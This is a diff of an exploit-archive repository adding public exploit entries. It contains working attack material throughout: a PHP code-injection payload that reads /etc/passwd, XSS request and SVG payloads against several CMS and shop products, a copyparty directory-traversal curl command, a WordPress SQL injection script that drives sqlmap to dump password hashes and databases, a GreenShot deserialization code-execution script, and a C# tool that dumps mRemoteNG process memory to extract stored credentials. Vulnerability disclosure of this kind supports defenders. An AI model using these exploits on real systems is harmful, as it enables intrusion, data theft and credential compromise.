payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
pheaders={
'Content-Type' : 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
}
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)
#rename
rename_req=session.get(rename_url)
#poc
poc_req=session.get(poc_url)
print(poc_req.text)
#youtube poc video - https://youtu.be/nn7hieGyCFs

43
exploits/php/webapps/51625.txt Normal file
View file

@ -0,0 +1,43 @@
Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
Application: Zomplog
Version: v3.9
Bugs: XSS
Technology: PHP
Vendor URL: http://zomp.nl/zomplog/
Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
Date of found: 22.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Login to account
2. Add new page
3. Set as <img src=x onerror=alert(4)>
4. Go to menu
Poc request:
POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
sec-ch-ua:
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close
empty=empty

114
exploits/php/webapps/51626.txt Normal file
View file

@ -0,0 +1,114 @@
# Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Tested on: Ubuntu 20.04
# Blog: http://msecureltd.blogspot.com
XSS #1:
Steps to Reproduce:
1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(`XSS`)</script>
// HTTP POST request
POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]
[...]
edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
[...]
// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
[...]
// HTTP GET request to Bookings page
GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]
// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
[...]
[...]
<label class="control-label" for="promo_code">Promo code:</label>
<input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
</div>
[...]
Unrestricted File Upload #1:
// SVG file contents
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(`XSS`);
</script>
</svg>
Steps to Reproduce:
1. Browse My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab
// HTTP POST request
POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]
[...]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(`XSS`);
</script>
</svg>
[...]
// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
[...]

34
exploits/php/webapps/51627.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Perch v3.2 - Persistent Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 23-July-2023
# Exploit Author: Dinesh Mohanty
# Vendor Homepage: https://grabaperch.com/
# Software Link: https://grabaperch.com/download
# Version: v3.2
# Tested on: Windows
# CVE : Requested
# Description:
Stored Cross Site Scripting (Stored XSS) Vulnerability is found in the file upload functionally under the create asset section.
#Steps to Reproduce
User needs to login into the application and needs to follow below steps:
1. Login into the application
2. From the left side menu go to Assets (http://URL/perch/core/apps/assets/)
3. Click on "Add assets" and fill all other details (Please note not all the text fields are vulnerable to XSS as they have output encoding)
4. Create the SVG file with below contents say xss.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
4. In the File upload section upload the above SVG file and submit
5. Now go to above SVG directly say the file is xss.svg
6. go to svg file (http://URL/perch/resources/xss.svg) or you can view all Assets and view the image
7. One can see that we got an XSS alert.

83
exploits/php/webapps/51628.txt Normal file
View file

@ -0,0 +1,83 @@
# Exploit Title: mooDating 1.2 - Reflected Cross-site scripting (XSS)
# Exploit Author: CraCkEr aka (skalvin)
# Date: 22/07/2023
# Vendor: mooSocial
# Vendor Homepage: https://moodatingscript.com/
# Software Link: https://demo.moodatingscript.com/home
# Version: 1.2
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-3849, CVE-2023-3848, CVE-2023-3847, CVE-2023-3846, CVE-2023-3843, CVE-2023-3845, CVE-2023-3844
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /matchmakings/question
URL parameter is vulnerable to RXSS
https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=
https://website/matchmakings/question[XSS]?number=
Path: /friends
URL parameter is vulnerable to RXSS
https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model
https://website/friends[XSS]/ajax_invite?mode=model
Path: /friends/ajax_invite
URL parameter is vulnerable to RXSS
https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model
https://website/friends/ajax_invite[XSS]?mode=model
Path: /pages
URL parameter is vulnerable to RXSS
https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
Path: /users
URL parameter is vulnerable to RXSS
https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity
https://website/user[XSS]/view/108?tab=activity
Path: /users/view
URL parameter is vulnerable to RXSS
https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity
https://website/users/view[XSS]/108?tab=activity
Path: /find-a-match
URL parameter is vulnerable to RXSS
https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0
https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0
[XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6
[-] Done

60
exploits/php/webapps/51629.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: Hikari Software Team
# Vendor Homepage: https://www.hikashop.com/
# Software Link: https://demo.hikashop.com/index.php/en/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/
# Version: 4.7.4
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /index.php
GET parameter 'from_option' is vulnerable to RXSS
https://website/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=[XSS]&from_ctrl=product&from_task=listing&from_itemid=103
Path: /index.php
GET parameter 'from_ctrl' is vulnerable to RXSS
https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=[XSS]&from_task=listing&from_itemid=103
Path: /index.php
GET parameter 'from_task' is vulnerable to RXSS
https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=[XSS]&from_itemid=103
Path: /index.php
GET parameter 'from_itemid' is vulnerable to RXSS
https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=listing&from_itemid=[XSS]
[XSS Payload]: uhqum"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wcn46
[-] Done

24
exploits/php/webapps/51630.txt Normal file
View file

@ -0,0 +1,24 @@
#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 29 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://octobercms.com
#Version: v3.4.4
#Tested on: Ubuntu 22.04
#CVE : N/A
# Proof of Concept:
1 Install the system through the website and log in with any user with file upload authority.
2 Select "Media" in the top menu. Prepare an SVG file using the payload below.
3 Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.
#Stored XSS Payload:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(1);
</script>
</svg>

39
exploits/php/webapps/51631.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: VirtueMart Team
# Vendor Homepage: https://www.virtuemart.net/
# Software Link: https://demo.virtuemart.net/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/
# Version: 4.0.12
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /product-variants
GET parameter 'keyword' is vulnerable to RXSS
https://website/product-variants?keyword=[XSS]&view=category&option=com_virtuemart&virtuemart_category_id=11&Itemid=925
[XSS Payload]: uk9ni"><script>alert(1)</script>a6di2
[-] Done

98
exploits/php/webapps/51632.py Executable file
View file

@ -0,0 +1,98 @@
#!/usr/bin/python3
# Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi
# Date: 2023-07-26
# Exploit Author: Lukas Kinneberg
# Github: https://github.com/lukinneberg/CVE-2023-2636
# Vendor Homepage: https://wordpress.org/plugins/an-gradebook/
# Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z
# Tested on: WordPress 6.2.2
# CVE: CVE-2023-2636
from datetime import datetime
import os
import requests
import json
# User Input:
target_ip = 'CHANGE_THIS'
target_port = '80'
username = 'hacker'
password = 'hacker'
banner = '''
____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
Exploit Author: Lukas Kinneberg
'''
print(banner)
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# SQL-Injection (Exploit):
# Generate payload for sqlmap
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')
print('[*] Payload for SQL-Injection:')
# Enter the URL path of the course after the target_port below
exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" '
exploitcode_risk = '--level 2 --risk 2 '
exploitcode_cookie = '--cookie="' + cookie + '" '
# SQLMAP Printout
print(' Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --banner Retrieve DBMS banner')
print(' --current-user Retrieve DBMS current user')
print(' --current-db Retrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tables Enumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schema Enumerate DBMS schema')
print(' --dump Dump DBMS database table entries')
print(' --dump-all Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

18
exploits/python/webapps/51635.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
# Date: 23/07/2023
# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6
# Version: <=1.8.6
# Tested on: Debian Linux
# CVE : CVE-2023-38501
#Description
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.
Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
#POC
https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E

17
exploits/python/webapps/51636.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474
#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.
#POC
curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'

42
exploits/windows/local/51633.ps1 Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
# Date: 26/07/2023
# Exploit Author: p4r4bellum
# Vendor Homepage: https://getgreenshot.org
# Software Link: https://getgreenshot.org/downloads/
# Version: 1.2.6.10
# Tested on: windows 10.0.19045 N/A build 19045
# CVE : CVE-2023-34634
#
# GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format
# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software
# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file
# will lead to arbitrary code execution
#
# Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw
#load the payload
$payload = Get-Content .\payload.bin -Encoding Byte
# retrieve the length of the payload
$length = $payload.Length
# load the required assembly to craft a PNG file
Add-Type -AssemblyName System.Drawing
# the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
$filename = "$home\poc.greenshot"
$bmp = new-object System.Drawing.Bitmap 250,61
$font = new-object System.Drawing.Font Consolas,24
$brushBg = [System.Drawing.Brushes]::Green
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10)
$graphics.Dispose()
$bmp.Save($filename)
# append the payload to the PNG file
$payload | Add-Content -Path $filename -Encoding Byte -NoNewline
# append the length of the payload
[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline
# append the signature
"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii
# launch greenshot. Calc.exe should be executed
Invoke-Item $filename

148
exploits/windows/local/51637.txt Normal file
View file

@ -0,0 +1,148 @@
# Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory
# Google Dork: -
# Date: 21.07.2023
# Exploit Author: Maximilian Barz
# Vendor Homepage: https://mremoteng.org/
# Software Link: https://mremoteng.org/download
# Version: mRemoteNG <= v1.77.3.1784-NB
# Tested on: Windows 11
# CVE : CVE-2023-30367
/*
Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to
store and manage multi-protocol connection configurations to remotely connect to systems.
mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev
loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,
even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text
through a memory dump and thus compromise user credentials when no custom password encryption key has been set.
This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.
Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper
*/
using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
namespace mRemoteNGDumper
{
public static class Program
{
public enum MINIDUMP_TYPE
{
MiniDumpWithFullMemory = 0x00000002
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MINIDUMP_EXCEPTION_INFORMATION
{
public uint ThreadId;
public IntPtr ExceptionPointers;
public int ClientPointers;
}
[DllImport("kernel32.dll")]
static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("Dbghelp.dll")]
static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
static void Main(string[] args)
{
string input;
bool configfound = false;
StringBuilder filesb;
StringBuilder linesb;
List<string> configs = new List<string>();
Process[] localByName = Process.GetProcessesByName("mRemoteNG");
if (localByName.Length == 0) {
Console.WriteLine("[-] No mRemoteNG process was found. Exiting");
System.Environment.Exit(1);
}
string assemblyPath = Assembly.GetEntryAssembly().Location;
Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);
string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";
FileStream procdumpFileStream = File.Create(dumpFileName);
MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();
// A full memory dump is necessary in the case of a managed application, other wise no information
// regarding the managed code will be available
MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;
MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);
procdumpFileStream.Close();
filesb = new StringBuilder();
Console.WriteLine("[+] Searching for configuration files in memory dump.");
using (StreamReader reader = new StreamReader(dumpFileName))
{
while (reader.Peek() >= 0)
{
input = reader.ReadLine();
string pattern = @"(\<Node)(.*)(?=\/>)\/>";
Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);
if (m.Success)
{
configfound = true;
foreach (string config in m.Value.Split('>'))
{
configs.Add(config);
}
}
}
reader.Close();
if (configfound)
{
string currentDir = System.IO.Directory.GetCurrentDirectory();
string dumpdir = currentDir + "/dump";
if (!Directory.Exists(dumpdir))
{
Directory.CreateDirectory(dumpdir);
}
string savefilepath;
for (int i =0; i < configs.Count;i++)
{
if (!string.IsNullOrEmpty(configs[i]))
{
savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";
Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);
using (StreamWriter writer = new StreamWriter(savefilepath))
{
writer.Write(configs[i]+'>');
writer.Close();
}
}
}
Console.WriteLine("[+] Done!");
Console.WriteLine("[+] Deleting memorydump file!");
File.Delete(dumpFileName);
Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" );
}
else
{
Console.WriteLine("[-] No configuration file found in memorydump. Exiting");
Console.WriteLine("[+] Deleting memorydump file!");
File.Delete(dumpFileName);
}
}
}
}
}

18
files_exploits.csv
View file

@ -10349,6 +10349,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28817,exploits/multiple/local/28817.txt,"Internet Security Systems 3.6 - 'ZWDeleteFile()' Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",local,multiple,,2006-10-16,2017-10-16,1,CVE-2006-7129;OSVDB-30901,,,,,https://www.securityfocus.com/bid/20546/info
19480,exploits/multiple/local/19480.c,"ISC INN 2.2 / RedHat Linux 6.0 - inews Buffer Overflow",1999-09-02,bawd,local,multiple,,1999-09-02,2012-06-30,1,CVE-1999-0705;OSVDB-16030,,,,,https://www.securityfocus.com/bid/616/info
45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple,,2018-07-18,2018-07-18,0,CVE-2018-4192,,,,,https://gist.github.com/itszn/5e6354ff7975e65e5867f3a660e23e05
51623,exploits/multiple/local/51623.cs,"Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping",2023-07-28,H4rk3nz0,local,multiple,,2023-07-28,2023-07-28,0,CVE-2023-36266,,,,,
40440,exploits/multiple/local/40440.py,"KeepNote 0.7.8 - Command Execution",2016-09-29,R-73eN,local,multiple,,2016-09-29,2016-09-29,0,,,,,http://www.exploit-db.comkeepnote-0.7.8.tar.gz,
11364,exploits/multiple/local/11364.txt,"LDAP - Injection",2010-02-09,mc2_s3lector,local,multiple,,2010-02-08,,0,,,,,,
46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,,2019-04-18,2019-04-18,1,CVE-2018-16858,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
@ -13386,6 +13387,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
29173,exploits/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusions",2006-11-23,ThE-LoRd-Of-CrAcKiNg,webapps,php,,2006-11-23,2016-12-20,1,,,,,,https://www.securityfocus.com/bid/21263/info
10597,exploits/php/webapps/10597.txt,"Active PHP BookMarks 1.3 - SQL Injection",2009-12-22,Mr.Elgaarh,webapps,php,,2009-12-21,,1,CVE-2008-3748;OSVDB-47577,,,,http://www.exploit-db.comapb-1.3.zip,
7289,exploits/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Blind SQL Injection",2008-11-30,R3d-D3V!L,webapps,php,,2008-11-29,2017-01-04,1,OSVDB-50834;CVE-2008-5975;CVE-2008-5638;OSVDB-50401,,,,,
51613,exploits/php/webapps/51613.txt,"Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-28,0,,,,,,
7301,exploits/php/webapps/7301.txt,"Active Time Billing 3.2 - Authentication Bypass",2008-11-30,AlpHaNiX,webapps,php,,2008-11-29,2017-01-04,1,OSVDB-50489;CVE-2008-5632,,,,,
7298,exploits/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection",2008-11-30,Cyber-Zone,webapps,php,,2008-11-29,2017-01-04,1,OSVDB-50400;CVE-2008-6380,,,,,
26501,exploits/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 - Admin Control Panel 'Username' SQL Injection",2005-11-12,bhs_team,webapps,php,,2005-11-12,2013-07-01,1,CVE-2005-3679;OSVDB-20949,,,,,https://www.securityfocus.com/bid/15400/info
@ -14328,6 +14330,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21007,exploits/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php?id' Blind SQL Injection",2012-09-02,DaOne,webapps,php,,2012-09-02,2012-09-02,1,OSVDB-85149,,,,,
4163,exploits/php/webapps/4163.php,"AV Tutorial Script 1.0 - Remote User Pass Change",2007-07-08,Dj7xpl,webapps,php,,2007-07-07,,1,OSVDB-42461;CVE-2007-3630,,,,,
37511,exploits/php/webapps/37511.txt,"AVA VoIP - Multiple Vulnerabilities",2012-07-17,"Ibrahim El-Sayed",webapps,php,,2012-07-17,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/54591/info
51626,exploits/php/webapps/51626.txt,"Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)",2023-07-28,"Andrey Stoykov",webapps,php,,2023-07-28,2023-07-28,0,,,,,,
6409,exploits/php/webapps/6409.txt,"AvailScript Article Script - 'articles.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,webapps,php,,2008-09-08,,1,OSVDB-47985;CVE-2008-4372;OSVDB-47984;CVE-2008-4371,,,,,
